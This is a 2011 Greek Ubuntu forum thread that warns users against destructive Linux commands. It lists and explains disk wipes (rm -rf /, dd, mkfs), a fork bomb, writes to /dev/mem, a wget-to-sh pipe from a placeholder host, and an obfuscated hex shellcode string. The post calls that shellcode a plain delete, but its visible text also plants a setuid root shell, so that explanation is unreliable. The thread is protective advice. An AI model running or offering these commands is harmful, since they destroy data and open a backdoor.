Σελίδα 1 από 3

Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 24 Μάιος 2011, 19:23
από Qdata
Παρακάτω θα βρείτε μερικές εντολές για τις οποίες πρέπει να είστε επιφυλακτικοί για την εκτέλεσή τους.
Πολλές από αυτές μπορεί να προκαλέσουν βλάβη στο σύστημά σας και να οδηγήσουν από απώλεια όλων των αρχείων σας μέχρι και καταστροφή του σκληρού σας δίσκου!

Μην επιχειρήσετε ποτέ να τις εκτελέσετε!Οι εντολές δύνονται για την προστασία μας από κακόβουλα άτομα!
Οι παρακάτω εντολές είναι επικίνδυνες τόσο για το Ubuntu αλλά και για κάθε σύστημα Linux.



Το sudo είναι μία εντολή που αναβαθμίζει προσωρινά έναν απλό χρήστη σε διαχειριστή (root). Το sudo ζητάει τον κωδικό του χρήστη σας ο οποίος για λόγους ασφαλείας κατά την πληκτρολόγηση δεν φαίνεται. Πληκτρολογείστε τον απλώς σωστά και πατήστε έντερ.



Κώδικας: Επιλογή όλων
sudo rm -rf /*

  • Μερικές παραλλαγές της:
  • sudo rm -rf /
  • rm -rf /
  • rm -rf *
  • rm -r .[^.]*
    Ας αναλύσουμε την εντολή περισσότερο:
    Η εντολή rm:
  • Διαγράφει τα αρχεία που θα δοθούν(στη περίπτωση μας το "/")

    Η παράμετρος -r:
  • Επιλέγει όλους τους φακέλους και υποφακέλους του φακέλου που δίνετε μετά(/) και εκτελεί σε αυτούς την κύρια εντολή(rm)

    Η παράμετρος f:
  • Εκτελεί την κύρια εντολή "αθόρυβα"!Δεν πρόκειτε να μας 'ρωτήσει' για οποιαδήποτε ενέργεια.

    Το "/":
  • Είναι ο κύριος φάκελος του συστήματός στον οποίο βρίσκετε όλο στο σύστημα αρχείων μας.Σε αυτόν το φάκελο γίνονται η ενέργειες που δηλώσαμε πριν(rm -rf)

--------------------------------------


Κώδικας: Επιλογή όλων
:(){ :|:& };:

ftso έγραψε: Αυτήν είναι μία Fork Bomb.Το σύστημα crashάρει και κολλάει.Μόνο hard reset σώζει την κατάσταση...αλλά είναι επικίνδυνο για το filesystem να γίνετε και υπάρχει κίνδυνος απώλειας δεδομένων.


--------------------------------------


Κώδικας: Επιλογή όλων
cal > /dev/mem


--------------------------------------


Κώδικας: Επιλογή όλων
find ./ * -exec rm {}  \;

-Διαγράφει κάθε αρχείο από τον τρέχων κατάλογο.

--------------------------------------


Κώδικας: Επιλογή όλων
mv /home/yourhomedirectory/* /dev/null

-Αυτή η εντολή διαγράφει τα πάντα από τον κατάλογο χρήστη σας και δεν γίνετε να επιστραφούν ποτέ(σε αυτό μας βοηθάει το ειδικό αρχείο /dev/null)!

--------------------------------------


Κώδικας: Επιλογή όλων
mkfs.ext3 /dev/sda

-Αυτή η εντολή διαγράφει τα πάντα από ένα partition.Πιο συγκεκριμένα του κάνει το λεγόμενο format (σε μορφή ext3).

--------------------------------------


Κώδικας: Επιλογή όλων
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

-Μια πολύ επικίνδυνη εντολή η οποία στην ουσία: είναι η εντολή rm -rf ~ / & κωδικοποιημένη σε hex.

--------------------------------------


Κώδικας: Επιλογή όλων
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

-Επίσης μια εκδοχή της εντολής rm -rf * σε ένα python script.

--------------------------------------


Κώδικας: Επιλογή όλων
rsync -r –delete /home/backup

-Διαγράφει τα πάντα από κάποιο κατάλογο

--------------------------------------


Κώδικας: Επιλογή όλων
dd if=/dev/random of=/dev/port

-Με αυτή την εντολή το σύστημά σας κολλάει και πολύ απίθανο να σας σώσει κάτι εκτός από την διακοπή παροχής ρεύματος στον υπολογιστή.

--------------------------------------


Κώδικας: Επιλογή όλων
dd if=/dev/zero of=/dev/sda

the_eye έγραψε:αλλά γεμίζει με μηδέν (0) τον sda (πρώτο) δίσκο στο σύστημά μας.


--------------------------------------


Κώδικας: Επιλογή όλων
chmod -x chmod

-Αλλάζει τα δικαιώματα στην ίδια την εντολή αλλαγής δικαιωμάτων ενός αρχείου(chmod) με αποτέλεσμα να μην μπορεί να εκτελεστεί.Αν παρόλα αυτά την εκτελέσετε υπάρχει τρόπος για να "σωθείτε": http://elkosmas.gr/2010/10/12/chmod_-x_chmod/

--------------------------------------


Κώδικας: Επιλογή όλων
wget http://some_place/some_file
sh ./some_file


+

Κώδικας: Επιλογή όλων
wget http://some_place/some_file -O- | sh


Οι παραπάνω εντολές κατεβάζουν από ένα σημείο στο διαδίκτυο ένα πιθανώς κακόβουλο πρόγραμμα και το εκτελούν απευθείας.Η εντολή wget είναι χρήσιμη ώστε να κατεβάζουμε αρχεία από το internet.Παρόλα αυτά κάποιο κακόβουλο άτομο μπορεί να σας δώσει εντολή για να κατεβάσετε αρχείο που μπορεί να προκαλέσει βλάβη στο σύστημά σας!


--------------------------------------


Κώδικας: Επιλογή όλων
any_command > /dev/sda

Οποιαδήποτε εντολή πριν από > /dev/sda ή > /dev/sda(και ένα αριθμό εδώ) θα δημιουργήσει βλάβη σε ένα partition του σκληρού σας δίσκου.

--------------------------------------


Κώδικας: Επιλογή όλων
sudo chmod -R 777 /

Αλλάζει τα δικαιώματα root στο σύστημα αρχείων, και δίνει δικαιώματα σε όλους τους χρήστες!
Αποτέλεσμα: να μην δουλεύουν πολλά και σημαντικά αρχεία σωστά στο σύστημα αρχείων.
Δύσκολη η επαναφορά του!
Από vagrale13

--------------------------------------


Κώδικας: Επιλογή όλων
cd ~; for x in `ls`; do mv -f $x $y; y=$x; done

Αλλάζει όλα τα ονόματα των αρχείων και φακέλων του χρήστη μας.
Αποτέλεσμα: Μη αναστρέψιμο!
Από vagrale13

--------------------------------------


Κώδικας: Επιλογή όλων
[ $[ $RANDOM % 6 ] == 0 ] && ( Οποιαδήποτε εντολή εδώ ) || echo "Something here"


ένα παράδειγμα είναι αυτό:

Κώδικας: Επιλογή όλων
[ $[ $RANDOM % 6] == 0 ] && sudo rm -rf /* || echo "Continue..."


ftso έγραψε:Το [ $[ $RANDOM % 6 ] == 0 ] εξετάζει αν η συνθήκη που περιέχεται είναι αληθής.
Αυτό θα συμβεί στην περίπτωση που η πράξη $RANDOM % 6 φέρει αποτέλεσμα μηδέν.
Η $RANDOM δίνει ένα τυχαίο αριθμό. Εκτέλεσε echo $RANDOM για να δεις.
To % 6 (πράξη modulo) διαιρεί τον αριθμό που έδωσε η $RANDOM και επιστρέφει το υπόλοιπο το οποίο θα είναι μηδέν μόνο στην περίπτωση που η διαίρεση είναι τέλεια.
Διαφορετικά θα είναι ένας ακέραιος από το 1-5.
Εκτέλεσε αρκετές φορές την εντολή let x=$RANDOM%6 ; echo $x για να δεις τα αποτελέσματα.

Το && σημαίνει πως η επόμενη εντολή ( Οποιαδήποτε εντολή εδώ ) θα εκτελεστεί μόνο αν η προηγούμενη της εκτελέστηκε χωρίς σφάλμα.
Δηλαδή όταν η συνθήκη είναι αληθής.

Το || είναι το λογικό OR και θα εκτελέσει οποιαδήποτε συνθήκη είναι αληθής.
Δηλαδή την
[ $[ $RANDOM % 6 ] == 0 ] && ( Οποιαδήποτε εντολή εδώ )
ή την
echo "Something here"

Αν η πρώτη είναι αληθής και εκτελεστεί τότε δεν θα εκτελέσει την δεύτερη.
Διαφορετικά αν η πρώτη δεν είναι αληθείς θα εκτελέσει την δεύτερη που είναι ούτως η άλλος αληθής καθώς είναι απλά μια echo.

Έχουμε 5/6 πιθανότητες να μας εμφανίζει απλώς στην οθόνη ένα μήνυμα και 1/6 πιθανότητες να καταστραφεί το σύστημά μας τελείως.

Οτιδήποτε είναι πριν το "||" έχει 1/6 πιθανότητες να εκτελεστεί.Και οτιδήποτε είναι μετά το "||" έχει 5/6 πιθανότητες να εκτελεστεί!

--------------------------------------


Κώδικας: Επιλογή όλων
#cat /dev/zero > /dev/mem

ftso έγραψε:Η εντολή αυτή παγώνει το σύστημα.


--------------------------------------


Αν ξέρετε κάποια άλλη εντολή γράψτε από κάτω ώστε να την προσθέσω εδώ, για να έχουμε μια πλήρης λίστα.


Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 24 Μάιος 2011, 19:31
από c7p
Qdata έγραψε:
Κώδικας: Επιλογή όλων
chmod +x chmod

-Αλλάζει τα δικαιώματα στην ίδια την εντολή αλλαγής δικαιωμάτων ενός αρχείου(chmod) με αποτέλεσμα να μην μπορεί να εκτελεστεί.Αν παρόλα αυτά την εκτελέσετε υπάρχει τρόπος για να "σωθείτε": http://elkosmas.gr/2010/10/12/chmod_-x_chmod/

--------------------------------------


Συνεχίζετε.....

Ενδιαφέρον... δεν ήξερα ότι μπορείς να αλλάξεις τα δικαιώματα σε μια εντολή :shock: . Γενικά ότι δεν ξέρουμε τι κάνει δεν το εκτελούμε, απλά !

Υπάρχει κάποιος τρόπος να δημιουργήσουμε μια "blacklist" με κάποιες εντολές, οι οποίες δεν θα επιτρέπονται να εκτελεστούν ;

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 24 Μάιος 2011, 19:35
από Qdata
c7p έγραψε:Υπάρχει κάποιος τρόπος να δημιουργήσουμε μια "blacklist" με κάποιες εντολές, οι οποίες δεν θα επιτρέπονται να εκτελεστούν ;


Κάτι έχω ακούσει εδώ μέσα(νομίζω ο ktogias το είπε).Πρέπει να γίνετε.
Μια άλλη λύση θα ήταν alias!Δεν ξέρω κατά πόσο γίνετε αυτό.Δηλαδή μια εντολή που έχουμε ορίσει να καταλήγει στο:
Κώδικας: Επιλογή όλων
echo "This is a bad command for Linux System!"

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 24 Μάιος 2011, 20:38
από vagrale13
Κώδικας: Επιλογή όλων
sudo chmod -R 777 /

Αλλαζει τα διακιαωμματα root στο συστημα αρχειων, και δινει δικαιωμματα σε ολους τους χρηστες!
Αποτελεσμα: να μην δουλευουν πολλα και σημαντικα αρχεια σωστα στο συστημα αρχειων.
Δυσκολο η επαναφορα του!


Κώδικας: Επιλογή όλων
cd ~; for x in `ls`; do mv -f $x $y; y=$x; done

Αλλαζει ολα τα ονοματα των αρχειων και φακελων του χρηστη μας.
Αποτελεσμα: Μη αναστρεψιμο!

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 24 Μάιος 2011, 20:43
από spyroskaftanis
Αυτές οι εντολές είναι ένα απλό παράδειγμα για το πως μπορεί να είναι ένας ιός στο Linux.
Ένα σκριπτάκι 2 γραμμών
Κώδικας: Επιλογή όλων
#! /bin/bash
rm -rf /

θα έσβηνε τα πάντα!!
Άρα μπορεί να θεωρηθεί ιός, σωστά;

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 24 Μάιος 2011, 21:02
από Qdata
spyroskaftanis έγραψε:Άρα μπορεί να θεωρηθεί ιός, σωστά;


Θα το λέγαμε γενικά Malware.Κακόβουλο πρόγραμμα δηλαδή!Πιο πολύ θα οφείλονταν στην άγνοια του χρήστη που θα έτρεχε το πρόγραμμα. ;)

Προστέθηκαν στην λίστα!

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 25 Μάιος 2011, 03:58
από Star_Light
Πολυ καλος και πολυ χρησιμος!!!!! :)

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 25 Μάιος 2011, 12:46
από matthew
:clap: Εύγε! Καλό για να γνωρίζουμε εμείς που δεν ξέρουμε προγραμματισμό τι κάνουν αυτές οι εντολές.
c7p έγραψε:Γενικά ότι δεν ξέρουμε τι κάνει δεν το εκτελούμε, απλά !
:thumbup:

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 25 Μάιος 2011, 12:52
από the_eye
Στο ubuntu πρέπει, για να βλάψει το σύστημα, να τρέξει η οποιαδήποτε εντολή με sudo.
To sudo θα δώσει δικαιώματα υπερχρήστη (root) στην εντολή και μόνο τότε μπορεί να κάνει ζημιά στο σύστημα. Αλλιώς μπορεί να βλάψει μόνο τον κατάλογο του χρήστη που την εκτελεί.

Ακόμα η εντολή
Qdata έγραψε: dd if=/dev/zero of=/dev/sda
-Γυρίζει το σύστημα στις αρχικές του ρυθμίσεις από το εργοστάσιο.

δεν γυρίζει το "σύστημα στις αρχικές του ρυθμίσεις από το εργοστάσιο", αλλά γεμίζει με μηδέν (0) τον sda (πρώτο) δίσκο στο σύστημά μας.

Re: Επικίνδυνες εντολές που θέλουν προσοχή!

ΔημοσίευσηΔημοσιεύτηκε: 25 Μάιος 2011, 13:11
από Qdata
@the_eye Ανανεώθηκε!